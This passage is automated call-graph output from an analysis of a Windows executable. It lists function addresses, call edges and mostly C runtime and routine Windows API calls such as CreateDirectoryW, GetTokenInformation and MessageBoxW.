17130->17135 17133 7ff6ba3ba900 _isindst 17 API calls 17134 7ff6ba3be854 17133->17134 17137 7ff6ba3ba4b1 17135->17137 17138 7ff6ba3ba4bb 17135->17138 17136 7ff6ba3b4f08 _get_daylight 11 API calls 17139 7ff6ba3ba4c2 17136->17139 17137->17138 17142 7ff6ba3ba4d6 17137->17142 17138->17136 17140 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17139->17140 17141 7ff6ba3ba4ce 17140->17141 17141->17126 17141->17133 17142->17141 17143 7ff6ba3b4f08 _get_daylight 11 API calls 17142->17143 17143->17139 17177 7ff6ba3c40ac 17144->17177 17148 7ff6ba3be3ac 17149 7ff6ba3be3b0 17148->17149 17150 7ff6ba3be401 17148->17150 17152 7ff6ba3be3cc 17148->17152 17149->17126 17230 7ff6ba3bdef0 17150->17230 17226 7ff6ba3be1ac 17152->17226 17155 7ff6ba3c40ac 38 API calls 17154->17155 17156 7ff6ba3be11e 17155->17156 17157 7ff6ba3c3af4 37 API calls 17156->17157 17158 7ff6ba3be16e 17157->17158 17159 7ff6ba3be172 17158->17159 17160 7ff6ba3be1ac 45 API calls 17158->17160 17159->17126 17160->17159 17162 7ff6ba3c40ac 38 API calls 17161->17162 17163 7ff6ba3bde3f 17162->17163 17164 7ff6ba3c3af4 37 API calls 17163->17164 17165 7ff6ba3bde97 17164->17165 17166 7ff6ba3bde9b 17165->17166 17167 7ff6ba3bdef0 45 API calls 17165->17167 17166->17126 17167->17166 17169 7ff6ba3bdaa1 17168->17169 17170 7ff6ba3bdad4 17168->17170 17171 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17169->17171 17172 7ff6ba3bdaec 17170->17172 17174 7ff6ba3bdb6d 17170->17174 17176 7ff6ba3bdacd __scrt_get_show_window_mode 17171->17176 17173 7ff6ba3bddf4 46 API calls 17172->17173 17173->17176 17175 7ff6ba3b47c0 45 API calls 17174->17175 17174->17176 17175->17176 17176->17126 17178 7ff6ba3c40ff fegetenv 17177->17178 17179 7ff6ba3c7e2c 37 API calls 17178->17179 17184 7ff6ba3c4152 17179->17184 17180 7ff6ba3c417f 17183 7ff6ba3ba4a4 __std_exception_copy 37 API calls 17180->17183 17181 7ff6ba3c4242 17182 7ff6ba3c7e2c 37 API calls 17181->17182 17185 7ff6ba3c426c 17182->17185 17186 7ff6ba3c41fd 17183->17186 17184->17181 17187 7ff6ba3c416d 17184->17187 17188 7ff6ba3c421c 17184->17188 17189 7ff6ba3c7e2c 37 API calls 17185->17189 17191 7ff6ba3c5324 17186->17191 17196 7ff6ba3c4205 17186->17196 17187->17180 17187->17181 17192 7ff6ba3ba4a4 __std_exception_copy 37 API calls 17188->17192 17190 7ff6ba3c427d 17189->17190 17193 7ff6ba3c8020 20 API calls 17190->17193 17194 7ff6ba3ba900 _isindst 17 API calls 17191->17194 17192->17186 17204 7ff6ba3c42e6 __scrt_get_show_window_mode 17193->17204 17195 7ff6ba3c5339 17194->17195 17197 7ff6ba3ac550 _log10_special 8 API calls 17196->17197 17198 7ff6ba3be351 17197->17198 17222 7ff6ba3c3af4 17198->17222 17199 7ff6ba3c468f __scrt_get_show_window_mode 17200 7ff6ba3c49cf 17201 7ff6ba3c3c10 37 API calls 17200->17201 17209 7ff6ba3c50e7 17201->17209 17202 7ff6ba3c497b 17202->17200 17205 7ff6ba3c533c memcpy_s 37 API calls 17202->17205 17203 7ff6ba3c4327 memcpy_s 17211 7ff6ba3c4783 memcpy_s __scrt_get_show_window_mode 17203->17211 17213 7ff6ba3c4c6b memcpy_s __scrt_get_show_window_mode 17203->17213 17204->17199 17204->17203 17207 7ff6ba3b4f08 _get_daylight 11 API calls 17204->17207 17205->17200 17206 7ff6ba3c5142 17212 7ff6ba3c52c8 17206->17212 17218 7ff6ba3c3c10 37 API calls 17206->17218 17220 7ff6ba3c533c memcpy_s 37 API calls 17206->17220 17208 7ff6ba3c4760 17207->17208 17210 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17208->17210 17209->17206 17214 7ff6ba3c533c memcpy_s 37 API calls 17209->17214 17210->17203 17211->17202 17216 7ff6ba3b4f08 11 API calls _get_daylight 17211->17216 17219 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 17211->17219 17217 7ff6ba3c7e2c 37 API calls 17212->17217 17213->17200 17213->17202 17215 7ff6ba3b4f08 11 API calls _get_daylight 17213->17215 17221 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 17213->17221 17214->17206 17215->17213 17216->17211 17217->17196 17218->17206 17219->17211 17220->17206 17221->17213 17223 7ff6ba3c3b13 17222->17223 17224 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17223->17224 17225 7ff6ba3c3b3e memcpy_s 17223->17225 17224->17225 17225->17148 17227 7ff6ba3be1d8 memcpy_s 17226->17227 17228 7ff6ba3b47c0 45 API calls 17227->17228 17229 7ff6ba3be292 memcpy_s __scrt_get_show_window_mode 17227->17229 17228->17229 17229->17149 17231 7ff6ba3bdf2b 17230->17231 17235 7ff6ba3bdf78 memcpy_s 17230->17235 17232 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17231->17232 17233 7ff6ba3bdf57 17232->17233 17233->17149 17234 7ff6ba3bdfe3 17236 7ff6ba3ba4a4 __std_exception_copy 37 API calls 17234->17236 17235->17234 17237 7ff6ba3b47c0 45 API calls 17235->17237 17240 7ff6ba3be025 memcpy_s 17236->17240 17237->17234 17238 7ff6ba3ba900 _isindst 17 API calls 17239 7ff6ba3be0d0 17238->17239 17240->17238 17242 7ff6ba3b0c5f 17241->17242 17248 7ff6ba3b0c4e 17241->17248 17243 7ff6ba3bd5fc _fread_nolock 12 API calls 17242->17243 17242->17248 17244 7ff6ba3b0c90 17243->17244 17245 7ff6ba3b0ca4 17244->17245 17246 7ff6ba3ba948 __free_lconv_mon 11 API calls 17244->17246 17247 7ff6ba3ba948 __free_lconv_mon 11 API calls 17245->17247 17246->17245 17247->17248 17248->17068 17250 7ff6ba3b4766 17249->17250 17252 7ff6ba3b476e 17249->17252 17251 7ff6ba3b47c0 45 API calls 17250->17251 17251->17252 17252->17079 17254 7ff6ba3b47ff 17253->17254 17255 7ff6ba3bd9d1 17253->17255 17257 7ff6ba3bda24 17254->17257 17255->17254 17256 7ff6ba3c3304 45 API calls 17255->17256 17256->17254 17258 7ff6ba3b480f 17257->17258 17259 7ff6ba3bda3d 17257->17259 17258->17001 17259->17258 17260 7ff6ba3c2650 45 API calls 17259->17260 17260->17258 17267 7ff6ba3c6d88 17261->17267 17266 7ff6ba3bf8a9 MultiByteToWideChar 17264->17266 17270 7ff6ba3c6dec 17267->17270 17268 7ff6ba3ac550 _log10_special 8 API calls 17269 7ff6ba3c00bd 17268->17269 17269->17102 17270->17268 17272 7ff6ba3b100f 17271->17272 17273 7ff6ba3b0ffd 17271->17273 17276 7ff6ba3b101d 17272->17276 17279 7ff6ba3b1059 17272->17279 17274 7ff6ba3b4f08 _get_daylight 11 API calls 17273->17274 17275 7ff6ba3b1002 17274->17275 17277 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17275->17277 17278 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17276->17278 17280 7ff6ba3b100d 17277->17280 17278->17280 17281 7ff6ba3b13d5 17279->17281 17283 7ff6ba3b4f08 _get_daylight 11 API calls 17279->17283 17280->16966 17281->17280 17282 7ff6ba3b4f08 _get_daylight 11 API calls 17281->17282 17284 7ff6ba3b1669 17282->17284 17285 7ff6ba3b13ca 17283->17285 17286 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17284->17286 17287 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17285->17287 17286->17280 17287->17281 17289 7ff6ba3b0704 17288->17289 17316 7ff6ba3b0464 17289->17316 17291 7ff6ba3b071d 17291->16619 17328 7ff6ba3b03bc 17292->17328 17296 7ff6ba3ac850 17295->17296 17297 7ff6ba3a2930 GetCurrentProcessId 17296->17297 17298 7ff6ba3a1c80 49 API calls 17297->17298 17299 7ff6ba3a2979 17298->17299 17342 7ff6ba3b4984 17299->17342 17304 7ff6ba3a1c80 49 API calls 17305 7ff6ba3a29ff 17304->17305 17372 7ff6ba3a2620 17305->17372 17308 7ff6ba3ac550 _log10_special 8 API calls 17309 7ff6ba3a2a31 17308->17309 17309->16658 17311 7ff6ba3b0119 17310->17311 17312 7ff6ba3a1b89 17310->17312 17313 7ff6ba3b4f08 _get_daylight 11 API calls 17311->17313 17312->16657 17312->16658 17314 7ff6ba3b011e 17313->17314 17315 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17314->17315 17315->17312 17317 7ff6ba3b04ce 17316->17317 17318 7ff6ba3b048e 17316->17318 17317->17318 17320 7ff6ba3b04da 17317->17320 17319 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17318->17319 17321 7ff6ba3b04b5 17319->17321 17327 7ff6ba3b546c EnterCriticalSection 17320->17327 17321->17291 17329 7ff6ba3b03e6 17328->17329 17340 7ff6ba3a1a20 17328->17340 17330 7ff6ba3b0432 17329->17330 17333 7ff6ba3b03f5 __scrt_get_show_window_mode 17329->17333 17329->17340 17341 7ff6ba3b546c EnterCriticalSection 17330->17341 17334 7ff6ba3b4f08 _get_daylight 11 API calls 17333->17334 17335 7ff6ba3b040a 17334->17335 17337 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17335->17337 17337->17340 17340->16627 17340->16628 17343 7ff6ba3b49de 17342->17343 17344 7ff6ba3b4a03 17343->17344 17346 7ff6ba3b4a3f 17343->17346 17345 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17344->17345 17348 7ff6ba3b4a2d 17345->17348 17381 7ff6ba3b2c10 17346->17381 17351 7ff6ba3ac550 _log10_special 8 API calls 17348->17351 17349 7ff6ba3b4b1c 17350 7ff6ba3ba948 __free_lconv_mon 11 API calls 17349->17350 17350->17348 17353 7ff6ba3a29c3 17351->17353 17360 7ff6ba3b5160 17353->17360 17354 7ff6ba3b4b40 17354->17349 17357 7ff6ba3b4b4a 17354->17357 17355 7ff6ba3b4af1 17358 7ff6ba3ba948 __free_lconv_mon 11 API calls 17355->17358 17356 7ff6ba3b4ae8 17356->17349 17356->17355 17359 7ff6ba3ba948 __free_lconv_mon 11 API calls 17357->17359 17358->17348 17359->17348 17361 7ff6ba3bb2c8 _get_daylight 11 API calls 17360->17361 17362 7ff6ba3b5177 17361->17362 17363 7ff6ba3beb98 _get_daylight 11 API calls 17362->17363 17366 7ff6ba3b51b7 17362->17366 17369 7ff6ba3a29e5 17362->17369 17364 7ff6ba3b51ac 17363->17364 17365 7ff6ba3ba948 __free_lconv_mon 11 API calls 17364->17365 17365->17366 17366->17369 17519 7ff6ba3bec20 17366->17519 17369->17304 17370 7ff6ba3ba900 _isindst 17 API calls 17371 7ff6ba3b51fc 17370->17371 17373 7ff6ba3a262f 17372->17373 17374 7ff6ba3a9390 2 API calls 17373->17374 17375 7ff6ba3a2660 17374->17375 17376 7ff6ba3a266f MessageBoxW 17375->17376 17377 7ff6ba3a2683 MessageBoxA 17375->17377 17378 7ff6ba3a2690 17376->17378 17377->17378 17379 7ff6ba3ac550 _log10_special 8 API calls 17378->17379 17380 7ff6ba3a26a0 17379->17380 17380->17308 17382 7ff6ba3b2c4e 17381->17382 17387 7ff6ba3b2c3e 17381->17387 17383 7ff6ba3b2c57 17382->17383 17391 7ff6ba3b2c85 17382->17391 17384 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17383->17384 17386 7ff6ba3b2c7d 17384->17386 17385 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17385->17386 17386->17349 17386->17354 17386->17355 17386->17356 17387->17385 17388 7ff6ba3b47c0 45 API calls 17388->17391 17389 7ff6ba3b2f34 17393 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17389->17393 17391->17386 17391->17387 17391->17388 17391->17389 17395 7ff6ba3b35a0 17391->17395 17421 7ff6ba3b3268 17391->17421 17451 7ff6ba3b2af0 17391->17451 17393->17387 17396 7ff6ba3b3655 17395->17396 17397 7ff6ba3b35e2 17395->17397 17400 7ff6ba3b36af 17396->17400 17401 7ff6ba3b365a 17396->17401 17398 7ff6ba3b367f 17397->17398 17399 7ff6ba3b35e8 17397->17399 17468 7ff6ba3b1b50 17398->17468 17407 7ff6ba3b35ed 17399->17407 17410 7ff6ba3b36be 17399->17410 17400->17398 17400->17410 17412 7ff6ba3b3618 17400->17412 17402 7ff6ba3b368f 17401->17402 17403 7ff6ba3b365c 17401->17403 17475 7ff6ba3b1740 17402->17475 17404 7ff6ba3b35fd 17403->17404 17409 7ff6ba3b366b 17403->17409 17420 7ff6ba3b36ed 17404->17420 17454 7ff6ba3b3f04 17404->17454 17407->17404 17411 7ff6ba3b3630 17407->17411 17407->17412 17409->17398 17414 7ff6ba3b3670 17409->17414 17410->17420 17482 7ff6ba3b1f60 17410->17482 17411->17420 17464 7ff6ba3b43c0 17411->17464 17412->17420 17489 7ff6ba3be858 17412->17489 17417 7ff6ba3b4558 37 API calls 17414->17417 17414->17420 17416 7ff6ba3ac550 _log10_special 8 API calls 17418 7ff6ba3b3983 17416->17418 17417->17412 17418->17391 17420->17416 17422 7ff6ba3b3289 17421->17422 17423 7ff6ba3b3273 17421->17423 17424 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17422->17424 17427 7ff6ba3b32c7 17422->17427 17425 7ff6ba3b3655 17423->17425 17426 7ff6ba3b35e2 17423->17426 17423->17427 17424->17427 17430 7ff6ba3b36af 17425->17430 17431 7ff6ba3b365a 17425->17431 17428 7ff6ba3b367f 17426->17428 17429 7ff6ba3b35e8 17426->17429 17427->17391 17435 7ff6ba3b1b50 38 API calls 17428->17435 17437 7ff6ba3b35ed 17429->17437 17439 7ff6ba3b36be 17429->17439 17430->17428 17430->17439 17449 7ff6ba3b3618 17430->17449 17432 7ff6ba3b368f 17431->17432 17433 7ff6ba3b365c 17431->17433 17438 7ff6ba3b1740 38 API calls 17432->17438 17434 7ff6ba3b35fd 17433->17434 17442 7ff6ba3b366b 17433->17442 17436 7ff6ba3b3f04 47 API calls 17434->17436 17450 7ff6ba3b36ed 17434->17450 17435->17449 17436->17449 17437->17434 17440 7ff6ba3b3630 17437->17440 17437->17449 17438->17449 17441 7ff6ba3b1f60 38 API calls 17439->17441 17439->17450 17443 7ff6ba3b43c0 47 API calls 17440->17443 17440->17450 17441->17449 17442->17428 17444 7ff6ba3b3670 17442->17444 17443->17449 17446 7ff6ba3b4558 37 API calls 17444->17446 17444->17450 17445 7ff6ba3ac550 _log10_special 8 API calls 17447 7ff6ba3b3983 17445->17447 17446->17449 17447->17391 17448 7ff6ba3be858 47 API calls 17448->17449 17449->17448 17449->17450 17450->17445 17502 7ff6ba3b0d14 17451->17502 17455 7ff6ba3b3f26 17454->17455 17456 7ff6ba3b0b80 12 API calls 17455->17456 17457 7ff6ba3b3f6e 17456->17457 17458 7ff6ba3be570 46 API calls 17457->17458 17459 7ff6ba3b4041 17458->17459 17460 7ff6ba3b47c0 45 API calls 17459->17460 17462 7ff6ba3b4063 17459->17462 17460->17462 17461 7ff6ba3b47c0 45 API calls 17463 7ff6ba3b40ec 17461->17463 17462->17461 17462->17462 17462->17463 17463->17412 17465 7ff6ba3b4440 17464->17465 17466 7ff6ba3b43d8 17464->17466 17465->17412 17466->17465 17467 7ff6ba3be858 47 API calls 17466->17467 17467->17465 17469 7ff6ba3b1b83 17468->17469 17470 7ff6ba3b1bb2 17469->17470 17472 7ff6ba3b1c6f 17469->17472 17471 7ff6ba3b0b80 12 API calls 17470->17471 17474 7ff6ba3b1bef 17470->17474 17471->17474 17473 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17472->17473 17473->17474 17474->17412 17476 7ff6ba3b1773 17475->17476 17477 7ff6ba3b17a2 17476->17477 17479 7ff6ba3b185f 17476->17479 17478 7ff6ba3b0b80 12 API calls 17477->17478 17481 7ff6ba3b17df 17477->17481 17478->17481 17480 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17479->17480 17480->17481 17481->17412 17483 7ff6ba3b1f93 17482->17483 17484 7ff6ba3b1fc2 17483->17484 17487 7ff6ba3b207f 17483->17487 17485 7ff6ba3b1fff 17484->17485 17486 7ff6ba3b0b80 12 API calls 17484->17486 17485->17412 17486->17485 17488 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17487->17488 17488->17485 17490 7ff6ba3be880 17489->17490 17491 7ff6ba3be8c5 17490->17491 17492 7ff6ba3b47c0 45 API calls 17490->17492 17495 7ff6ba3be885 __scrt_get_show_window_mode 17490->17495 17498 7ff6ba3be8ae __scrt_get_show_window_mode 17490->17498 17491->17495 17491->17498 17499 7ff6ba3c07e8 17491->17499 17492->17491 17493 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17493->17495 17495->17412 17498->17493 17498->17495 17501 7ff6ba3c080c WideCharToMultiByte 17499->17501 17503 7ff6ba3b0d41 17502->17503 17504 7ff6ba3b0d53 17502->17504 17505 7ff6ba3b4f08 _get_daylight 11 API calls 17503->17505 17507 7ff6ba3b0d60 17504->17507 17510 7ff6ba3b0d9d 17504->17510 17506 7ff6ba3b0d46 17505->17506 17508 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17506->17508 17509 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17507->17509 17515 7ff6ba3b0d51 17508->17515 17509->17515 17511 7ff6ba3b0e46 17510->17511 17513 7ff6ba3b4f08 _get_daylight 11 API calls 17510->17513 17512 7ff6ba3b4f08 _get_daylight 11 API calls 17511->17512 17511->17515 17514 7ff6ba3b0ef0 17512->17514 17516 7ff6ba3b0e3b 17513->17516 17517 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17514->17517 17515->17391 17518 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17516->17518 17517->17515 17518->17511 17524 7ff6ba3bec3d 17519->17524 17520 7ff6ba3bec42 17521 7ff6ba3b4f08 _get_daylight 11 API calls 17520->17521 17522 7ff6ba3b51dd 17520->17522 17523 7ff6ba3bec4c 17521->17523 17522->17369 17522->17370 17525 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17523->17525 17524->17520 17524->17522 17526 7ff6ba3bec8c 17524->17526 17525->17522 17526->17522 17527 7ff6ba3b4f08 _get_daylight 11 API calls 17526->17527 17527->17523 17529 7ff6ba3a85b1 GetTokenInformation 17528->17529 17530 7ff6ba3a8633 __std_exception_copy 17528->17530 17531 7ff6ba3a85d2 GetLastError 17529->17531 17532 7ff6ba3a85dd 17529->17532 17533 7ff6ba3a8646 CloseHandle 17530->17533 17534 7ff6ba3a864c 17530->17534 17531->17530 17531->17532 17532->17530 17535 7ff6ba3a85f9 GetTokenInformation 17532->17535 17533->17534 17534->16676 17535->17530 17536 7ff6ba3a861c 17535->17536 17536->17530 17537 7ff6ba3a8626 ConvertSidToStringSidW 17536->17537 17537->17530 17539 7ff6ba3ac850 17538->17539 17540 7ff6ba3a2b74 GetCurrentProcessId 17539->17540 17541 7ff6ba3a26b0 48 API calls 17540->17541 17542 7ff6ba3a2bc7 17541->17542 17543 7ff6ba3b4bd8 48 API calls 17542->17543 17544 7ff6ba3a2c10 MessageBoxW 17543->17544 17545 7ff6ba3ac550 _log10_special 8 API calls 17544->17545 17546 7ff6ba3a2c40 17545->17546 17546->16686 17548 7ff6ba3a25e5 17547->17548 17549 7ff6ba3b4bd8 48 API calls 17548->17549 17550 7ff6ba3a2604 17549->17550 17550->16701 17596 7ff6ba3b8794 17551->17596 17555 7ff6ba3a81dc 17554->17555 17556 7ff6ba3a9390 2 API calls 17555->17556 17557 7ff6ba3a81fb 17556->17557 17558 7ff6ba3a8203 17557->17558 17559 7ff6ba3a8216 ExpandEnvironmentStringsW 17557->17559 17560 7ff6ba3a2810 49 API calls 17558->17560 17561 7ff6ba3a823c __std_exception_copy 17559->17561 17562 7ff6ba3a820f __std_exception_copy 17560->17562 17563 7ff6ba3a8240 17561->17563 17564 7ff6ba3a8253 17561->17564 17566 7ff6ba3ac550 _log10_special 8 API calls 17562->17566 17565 7ff6ba3a2810 49 API calls 17563->17565 17568 7ff6ba3a8261 GetDriveTypeW 17564->17568 17569 7ff6ba3a82bf 17564->17569 17565->17562 17567 7ff6ba3a83af 17566->17567 17567->16700 17586 7ff6ba3b8238 17567->17586 17572 7ff6ba3a82b0 17568->17572 17573 7ff6ba3a8295 17568->17573 17570 7ff6ba3b7e08 45 API calls 17569->17570 17574 7ff6ba3a82d1 17570->17574 17719 7ff6ba3b796c 17572->17719 17575 7ff6ba3a2810 49 API calls 17573->17575 17577 7ff6ba3a82d9 17574->17577 17584 7ff6ba3a82ec 17574->17584 17575->17562 17578 7ff6ba3a2810 49 API calls 17577->17578 17578->17562 17579 7ff6ba3a834e CreateDirectoryW 17579->17562 17581 7ff6ba3a835d GetLastError 17579->17581 17580 7ff6ba3a26b0 48 API calls 17582 7ff6ba3a8328 CreateDirectoryW 17580->17582 17581->17562 17583 7ff6ba3a836a GetLastError 17581->17583 17582->17584 17585 7ff6ba3a2c50 51 API calls 17583->17585 17584->17579 17584->17580 17585->17562 17587 7ff6ba3b8245 17586->17587 17588 7ff6ba3b8258 17586->17588 17589 7ff6ba3b4f08 _get_daylight 11 API calls 17587->17589 17735 7ff6ba3b7ebc 17588->17735 17591 7ff6ba3b824a 17589->17591 17593 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17591->17593 17595 7ff6ba3b8256 17593->17595 17595->16704 17637 7ff6ba3c1558 17596->17637 17696 7ff6ba3c12d0 17637->17696 17717 7ff6ba3c02d8 EnterCriticalSection 17696->17717 17720 7ff6ba3b79bd 17719->17720 17721 7ff6ba3b798a 17719->17721 17720->17562 17721->17720 17726 7ff6ba3c0474 17721->17726 17724 7ff6ba3ba900 _isindst 17 API calls 17725 7ff6ba3b79ed 17724->17725 17727 7ff6ba3c0481 17726->17727 17728 7ff6ba3c048b 17726->17728 17727->17728 17733 7ff6ba3c04a7 17727->17733 17729 7ff6ba3b4f08 _get_daylight 11 API calls 17728->17729 17730 7ff6ba3c0493 17729->17730 17732 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17730->17732 17731 7ff6ba3b79b9 17731->17720 17731->17724 17732->17731 17733->17731 17734 7ff6ba3b4f08 _get_daylight 11 API calls 17733->17734 17734->17730 17742 7ff6ba3c02d8 EnterCriticalSection 17735->17742 17744 7ff6ba3a456a 17743->17744 17745 7ff6ba3a9390 2 API calls 17744->17745 17746 7ff6ba3a458f 17745->17746 17747 7ff6ba3ac550 _log10_special 8 API calls 17746->17747 17748 7ff6ba3a45b7 17747->17748 17748->16737 17750 7ff6ba3a7e2e 17749->17750 17751 7ff6ba3a7f52 17750->17751 17752 7ff6ba3a1c80 49 API calls 17750->17752 17754 7ff6ba3ac550 _log10_special 8 API calls 17751->17754 17753 7ff6ba3a7eb5 17752->17753 17753->17751 17756 7ff6ba3a1c80 49 API calls 17753->17756 17757 7ff6ba3a4560 10 API calls 17753->17757 17758 7ff6ba3a7f0b 17753->17758 17755 7ff6ba3a7f83 17754->17755 17755->16737 17756->17753 17757->17753 17759 7ff6ba3a9390 2 API calls 17758->17759 17760 7ff6ba3a7f23 CreateDirectoryW 17759->17760 17760->17751 17760->17753 17762 7ff6ba3a1613 17761->17762 17763 7ff6ba3a1637 17761->17763 17882 7ff6ba3a1050 17762->17882 17764 7ff6ba3a45c0 108 API calls 17763->17764 17766 7ff6ba3a164b 17764->17766 17768 7ff6ba3a1653 17766->17768 17769 7ff6ba3a1682 17766->17769 17767 7ff6ba3a1618 17770 7ff6ba3a162e 17767->17770 17773 7ff6ba3a2710 54 API calls 17767->17773 17771 7ff6ba3b4f08 _get_daylight 11 API calls 17768->17771 17772 7ff6ba3a45c0 108 API calls 17769->17772 17770->16737 17774 7ff6ba3a1658 17771->17774 17775 7ff6ba3a1696 17772->17775 17773->17770 17776 7ff6ba3a2910 54 API calls 17774->17776 17777 7ff6ba3a169e 17775->17777 17778 7ff6ba3a16b8 17775->17778 17779 7ff6ba3a1671 17776->17779 17780 7ff6ba3a2710 54 API calls 17777->17780 17781 7ff6ba3b06d4 73 API calls 17778->17781 17779->16737 17783 7ff6ba3a16ae 17780->17783 17782 7ff6ba3a16cd 17781->17782 17784 7ff6ba3a16d1 17782->17784 17785 7ff6ba3a16f9 17782->17785 17789 7ff6ba3b004c 74 API calls 17783->17789 17786 7ff6ba3b4f08 _get_daylight 11 API calls 17784->17786 17787 7ff6ba3a16ff 17785->17787 17788 7ff6ba3a1717 17785->17788 17790 7ff6ba3a16d6 17786->17790 17860 7ff6ba3a1210 17787->17860 17794 7ff6ba3a1739 17788->17794 17805 7ff6ba3a1761 17788->17805 17792 7ff6ba3a1829 17789->17792 17793 7ff6ba3a2910 54 API calls 17790->17793 17792->16737 17800 7ff6ba3a16ef __std_exception_copy 17793->17800 17796 7ff6ba3b4f08 _get_daylight 11 API calls 17794->17796 17795 7ff6ba3b004c 74 API calls 17795->17783 17797 7ff6ba3a173e 17796->17797 17798 7ff6ba3a2910 54 API calls 17797->17798 17798->17800 17799 7ff6ba3b039c _fread_nolock 53 API calls 17799->17805 17800->17795 17801 7ff6ba3a17da 17802 7ff6ba3b4f08 _get_daylight 11 API calls 17801->17802 17804 7ff6ba3a17ca 17802->17804 17807 7ff6ba3a2910 54 API calls 17804->17807 17805->17799 17805->17800 17805->17801 17806 7ff6ba3a17c5 17805->17806 17913 7ff6ba3b0adc 17805->17913 17808 7ff6ba3b4f08 _get_daylight 11 API calls 17806->17808 17807->17800 17808->17804 17810 7ff6ba3a7144 17809->17810 17811 7ff6ba3a718b 17809->17811 17810->17811 17946 7ff6ba3b5024 17810->17946 17811->16737 17814 7ff6ba3a41a1 17813->17814 17815 7ff6ba3a44e0 49 API calls 17814->17815 17816 7ff6ba3a41db 17815->17816 17817 7ff6ba3a44e0 49 API calls 17816->17817 17818 7ff6ba3a41eb 17817->17818 17819 7ff6ba3a420d 17818->17819 17820 7ff6ba3a423c 17818->17820 17961 7ff6ba3a4110 17819->17961 17821 7ff6ba3a4110 51 API calls 17820->17821 17823 7ff6ba3a423a 17821->17823 17824 7ff6ba3a4267 17823->17824 17825 7ff6ba3a429c 17823->17825 17968 7ff6ba3a7cf0 17824->17968 17827 7ff6ba3a4110 51 API calls 17825->17827 17829 7ff6ba3a42c0 17827->17829 17832 7ff6ba3a4110 51 API calls 17829->17832 17838 7ff6ba3a4312 17829->17838 17830 7ff6ba3a4393 17833 7ff6ba3a1950 115 API calls 17830->17833 17831 7ff6ba3a2710 54 API calls 17835 7ff6ba3a4297 17831->17835 17836 7ff6ba3a42e9 17832->17836 17837 7ff6ba3a439d 17833->17837 17834 7ff6ba3ac550 _log10_special 8 API calls 17839 7ff6ba3a4435 17834->17839 17835->17834 17836->17838 17842 7ff6ba3a4110 51 API calls 17836->17842 17840 7ff6ba3a43fe 17837->17840 17841 7ff6ba3a43a5 17837->17841 17838->17830 17844 7ff6ba3a438c 17838->17844 17846 7ff6ba3a4317 17838->17846 17848 7ff6ba3a437b 17838->17848 17839->16737 17843 7ff6ba3a2710 54 API calls 17840->17843 17994 7ff6ba3a1840 17841->17994 17842->17838 17843->17846 17844->17841 17844->17846 17849 7ff6ba3a2710 54 API calls 17846->17849 17852 7ff6ba3a2710 54 API calls 17848->17852 17849->17835 17850 7ff6ba3a43d2 17854 7ff6ba3a1600 118 API calls 17850->17854 17851 7ff6ba3a43bc 17853 7ff6ba3a2710 54 API calls 17851->17853 17852->17846 17853->17835 17855 7ff6ba3a43e0 17854->17855 17855->17835 17856 7ff6ba3a2710 54 API calls 17855->17856 17856->17835 17858 7ff6ba3a1c80 49 API calls 17857->17858 17859 7ff6ba3a4474 17858->17859 17859->16737 17861 7ff6ba3a1268 17860->17861 17862 7ff6ba3a126f 17861->17862 17863 7ff6ba3a1297 17861->17863 17864 7ff6ba3a2710 54 API calls 17862->17864 17866 7ff6ba3a12b1 17863->17866 17867 7ff6ba3a12d4 17863->17867 17865 7ff6ba3a1282 17864->17865 17865->17800 17868 7ff6ba3b4f08 _get_daylight 11 API calls 17866->17868 17871 7ff6ba3a12e6 17867->17871 17880 7ff6ba3a1309 memcpy_s 17867->17880 17869 7ff6ba3a12b6 17868->17869 17870 7ff6ba3a2910 54 API calls 17869->17870 17876 7ff6ba3a12cf __std_exception_copy 17870->17876 17872 7ff6ba3b4f08 _get_daylight 11 API calls 17871->17872 17873 7ff6ba3a12eb 17872->17873 17875 7ff6ba3a2910 54 API calls 17873->17875 17874 7ff6ba3b039c _fread_nolock 53 API calls 17874->17880 17875->17876 17876->17800 17877 7ff6ba3a13cf 17878 7ff6ba3a2710 54 API calls 17877->17878 17878->17876 17879 7ff6ba3b0adc 76 API calls 17879->17880 17880->17874 17880->17876 17880->17877 17880->17879 17881 7ff6ba3b0110 37 API calls 17880->17881 17881->17880 17883 7ff6ba3a45c0 108 API calls 17882->17883 17884 7ff6ba3a108c 17883->17884 17885 7ff6ba3a1094 17884->17885 17886 7ff6ba3a10a9 17884->17886 17887 7ff6ba3a2710 54 API calls 17885->17887 17888 7ff6ba3b06d4 73 API calls 17886->17888 17894 7ff6ba3a10a4 __std_exception_copy 17887->17894 17889 7ff6ba3a10bf 17888->17889 17890 7ff6ba3a10c3 17889->17890 17891 7ff6ba3a10e6 17889->17891 17892 7ff6ba3b4f08 _get_daylight 11 API calls 17890->17892 17896 7ff6ba3a1122 17891->17896 17897 7ff6ba3a10f7 17891->17897 17893 7ff6ba3a10c8 17892->17893 17895 7ff6ba3a2910 54 API calls 17893->17895 